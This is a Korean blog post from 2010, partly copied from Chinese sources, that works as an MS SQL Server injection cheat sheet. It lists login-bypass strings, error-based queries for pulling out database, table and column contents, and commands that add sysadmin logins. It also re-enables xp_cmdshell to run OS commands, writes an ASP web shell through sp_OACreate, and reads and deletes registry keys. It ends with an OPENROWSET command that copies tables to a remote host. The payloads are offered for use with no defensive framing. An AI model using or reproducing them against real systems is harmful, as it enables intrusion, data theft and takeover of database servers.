sql injection +cmdshell 등등 프로시져 정보
웹/공격 2010. 4. 16. 13:13 |출처 : http://ericson.kr/30?category=1
1. 인젝선 기본
1.http://xxx.xxx.xxx?id=1 and [조회]
select * from table where id=1 and [조회]
2.http://xxx.xxx.xxx?name=test' and [조회] and ''='
select * from table where name='test' and [조회] and ''=''
3.http://xxx.xxx.xxx?query=' and [조회] and '%25'='
select * from table where query like '%' and [조회] and '%'='%'
1)' or''='
2) ' or 1=1--
3) ' or 'a'='a--
4) 'or'='or'
5) " or 1=1--
6)or 1=1--
7) or 'a='a
8)" or "a"="a
9) ') or ('a'='a
10) ") or ("a"="a
11) ) or (1=1
2. 데이터베이스 정보 조회
0.버전 확인
and 1=(select @@VERSION)
http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
1.권한 확인
1)서버 역할의 멤버:
and 1=(IS_SRVROLEMEMBER('sysadmin'))
sysadmin,dbcreator,diskadmin,processadmin,serveradmin,setupadmin,securityadmin
2)데이타베이스 역할의 멤버:
and 1=(IS_MEMBER('db_owner'))
3)判断是否支持多句执行
;declare @a int;--
2.DB이름 확인
and 0<>db_name()
http://192.168.1.5/display.asp?keyno=188%20and%200<>db_name()
3.사용자 확인
and user>0
4.得到库名
sysdatabases内dbid为1-6的是系统自建表
and 1=(select name from master.dbo.sysdatabases where dbid=7)
and 1=(select name from master.dbo.sysdatabases where dbid=8)
5.得到表名
and 0<>(select top 1 name from master.dbo.sysobjects where xtype=char(85))
and 0<>(select top 1 name from (select top 10 * name from master.dbo.sysobjects where xtype='U' order by name asc) as table1 order by name desc)
http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
6.得到字段名
1)得到表的id
and 0<>(select count(*) from master.dbo.sysobjects where xtype='U' and name=char(97)%2Bchar(98)%2Bchar(99) and uid>(str(id)))
2)用得到的id查询列
and 0<>(select top 1 name from master.dbo.syscolumns where id=235147883)
and 0<>(select top 1 name from (select top 10 name from master.dbo.syscolumns where id=235147883 order by name asc) as table1 order by name desc)
7.得到字段内容
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from master.dbo.表名)
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from master.dbo.表名 where 字段名 not in('已得到内容'))
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from (select top 行数 字段名 from 库名.dbo.表名 order by 字段名 asc) as table1 order by 字段名 desc)
3. 기타 정보
0.계정 정보 변경
;exec sp_addlogin '아이디', '패스워드';--
;exec sp_password '이전 패스워드', '새로운 패스워드', '아이디';--
;exec master.dbo.sp_addsrvrolemember '아이디' 'sysadmin';--
;exec sp_droplogin '아이디';--
1.cmd 명령어
1)xp_cmdshell 프로시저 등록
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
;exec master.dbo.sp_dropextendedproc 'xp_cmdshell';--
;dbcc addextendedproc ("xp_cmdshell","xplog70.dll");--
2)xp_cmdshell 실행
;exec master..xp_cmdshell 'ping 111.222.333.444';--
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\';--
;exec master..xp_cmdshell 'echo 要写入内容>>绝对路径';--
3)回显
;Drop table cmd_list ;CREATE TABLE cmd_list (ComResult nvarchar(8000)) INSERT cmd_list EXEC MASTER..xp_cmdshell 'ipconfig -all';--
and (select char(94)+cast(count(1) as varchar(8000))+char(94) from comd_list where 1=1)>0
2.윈도우 서비스 제어
;exec master.dbo.xp_servicecontrol 'start', 'schedule';--
3.利用SP_OAcreate,SP_OAMETHOD执行对象
1)복원
;exec master.dbo.sp_addextendedproc 'sp_OACreate','odsole70.dll';--
;dbcc addextendedproc ("sp_OACreate","odsole70.dll");--
2)실행
;DECLARE @o INT EXEC SP_OAcreate 'wscript.shell',@o OUT EXEC SP_OAMETHOD @o,'run',null, 'J:\WINDOWS\system32\cmd.exe /c net user aaa3 /add';--
;declare @o int,@f int exec sp_oacreate 'scripting.filesystemobject',@o out exec sp_oamethod @o,'createtextfile',@f out,'j:\foo5.asp',1 exec sp_oamethod @f,'writeline',NULL,'<% set o=server.createobject("wscript.shell")' exec sp_oamethod @f,'writeline',NULL,'o.run(request.querystring("cmd")) %>'
4.浏览目录
1)创建临时表
;create table temp1(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
2)获得当前所有驱动器
;insert temp1(id,num1,num2,num3) exec master.dbo.xp_availablemedia;--
3)获得当前子目录列表
;insert into temp(id,num1) exec master.dbo.xp_subdirs 'c:\';--
4)获得所有子目录的目录树结构
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
5)搜索文件
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
6)读取表中内容
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from (select top 行数 字段名 from 库名.dbo.表名 order by 字段名 asc) as table1 order by 字段名 desc)
5.从文件导入到表中
;create table 表名(line varchar(8000));--
;bulk insert 表名 from '绝对路径';--
6.레지스트리 제어
1)레지스트리 값 exec xp_regenumvalues
;drop table temp2;create table temp2(a varchar(1000),b varchar(8000));insert into temp2 exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run';--
2)레지스트리 키 xp_regread
;drop table temp2;create table temp2(a varchar(1000),b varchar(8000));insert into temp2 exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir';--
3)레지스트리 쓰기 xp_regwrite
;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','REG_SZ','hello';--
;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','REG_DWORD','6';--
4)레지스트리 값 삭제 xp_regdeletevalue
;exec master.dbo.xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName';--
5)레지스트리 키 삭제 xp_regdeletekey
;exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey';--
7.기타 유용한 프로시저
xp_msver Microsoft SQL Server 정보
xp_enumdsn ODBC 정보
xp_ntsec_enumdomains 도메인정보
xp_logininfo Microsoft SQL Server 로그인 정보
sp_configure 컨피그레이션
sp_helpextendedproc 프로시저 리스트
4. 复制远程数据库(反向连接)
;insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=password;Network=DBMSSOCN;Address=111.222.333.444,1433;', 'select * from dest_table') select * from src_table;--
5. 备份数据库
1)首次完整备份
;backup database 데이터베이스 to disk='경로';--
2)差异备份,生成文件较小
;backup database 데이터베이스 to disk='경로' WITH DIFFERENTIAL,FORMAT;--